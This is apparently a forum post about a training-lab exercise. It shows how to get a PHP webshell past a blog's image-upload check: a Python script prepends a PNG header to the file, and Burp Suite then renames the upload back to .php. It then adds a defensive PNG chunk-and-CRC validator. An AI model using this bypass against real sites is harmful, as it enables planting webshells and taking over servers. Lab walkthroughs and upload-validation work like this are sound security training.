Reverse Shell & Payloads - The live engagement

I was stuck at host 2 with the 50064.rb for a while until I realized I was using the wrong password lol. I had admin!@# instead of admin123!@# for some reason and that was what was creating the “unexpected json response” for me apparently (even though I also got the “successfully logged in with admin” message???). So yeah, I’d recommend triple checking every option. This is what ended up working for me:

If you don't want to go the Metasploit way at all, we can achieve the same thing by observing what the exploit is doing.

  • The blog is checking for an image extension in the file we upload.

  • If we change the .php to .png it doesn't accept it, because it is also checking for a valid image header.

So, we need to figure out a way to trick the server into accepting a .php by making it believe it is an image file.

  1. Get a copy of a PHP webshell and dump it onto your machine.
  2. Now we need to add a PNG header to this webshell. Execute the Python script below:

```python
import base64

# Base64-encoded start of a real PNG file (signature and first chunks)
png_header_base64 = 'iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4'

# Decode the PNG header
png_header = base64.b64decode(png_header_base64)

# Specify the file name
file_name = 'webshell.php'

# Read the existing content of the PHP file
with open(file_name, 'rb') as file:
    php_content = file.read()

# Combine the PNG header with the PHP content
new_content = png_header + php_content

# Write the modified content back to the PHP file
with open(file_name, 'wb') as file:
    file.write(new_content)
```

  3. Rename webshell.php to webshell.png.
  4. Now open Burp Suite and turn the interceptor on.
  5. Go to the blog and upload this webshell.png.
  6. Burp will intercept this request; just change the extension from webshell.png to webshell.php and hit Forward.
  7. This will trick the server and the post gets uploaded.
  8. Hover over the image to see where it's located.
  9. Go to the location and click on the uploaded PHP file and voilà, you get a shell!!

Check out my solution if you want to know how the exploit is working and how to achieve it manually.
For Metasploit, @yearsandseconds' solution is enough.
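From the defender's side, the upload check this trick gets past is one that only looks at the first bytes of the file. As an added example (not code from the original post or the lab), the validator below walks every PNG chunk and verifies each length and CRC, and refuses anything after IEND, so a PNG header glued onto a script body fails the chunk walk. The function names and the harmless PHP body are my own constructions; the base64 header is the one from the post.

```python
import base64
import os
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXTENSIONS = {".png"}

def validate_png_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Accept only a complete PNG with an allowed extension: every chunk's
    length and CRC is checked and nothing may follow IEND, so a PNG header
    glued onto a script body (the trick above) fails at its first bad chunk."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(PNG_SIGNATURE):
        return False, "missing PNG signature"
    pos = len(PNG_SIGNATURE)
    while True:
        if len(data) - pos < 12:  # length(4) + type(4) + crc(4) at minimum
            return False, "truncated chunk stream (no IEND)"
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc) != 4:
            return False, f"truncated {ctype!r} chunk"
        if zlib.crc32(ctype + body) != struct.unpack(">I", crc)[0]:
            return False, f"CRC mismatch in {ctype!r} chunk"
        pos += 12 + length
        if ctype == b"IEND":
            break
    if pos != len(data):
        return False, f"{len(data) - pos} trailing bytes after IEND"
    return True, "ok"

def _chunk(ctype: bytes, body: bytes) -> bytes:
    # Length-prefixed chunk with the CRC over type + body, as the PNG spec requires
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def build_minimal_png() -> bytes:
    """A genuine 1x1 grayscale PNG, constructed here as the benign sample."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit gray, no interlace
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

def build_polyglot_sample() -> bytes:
    """The post's PNG header prefix followed by a harmless PHP body (constructed)."""
    header = base64.b64decode("iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4")
    return header + b"<?php echo 'constructed sample, not a shell'; ?>\n"
```

Storing the upload under a server-generated name rather than the client-supplied one closes the rename step as well, since the extension check then runs on a value the client never controlled.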

Most likely you used the wrong password.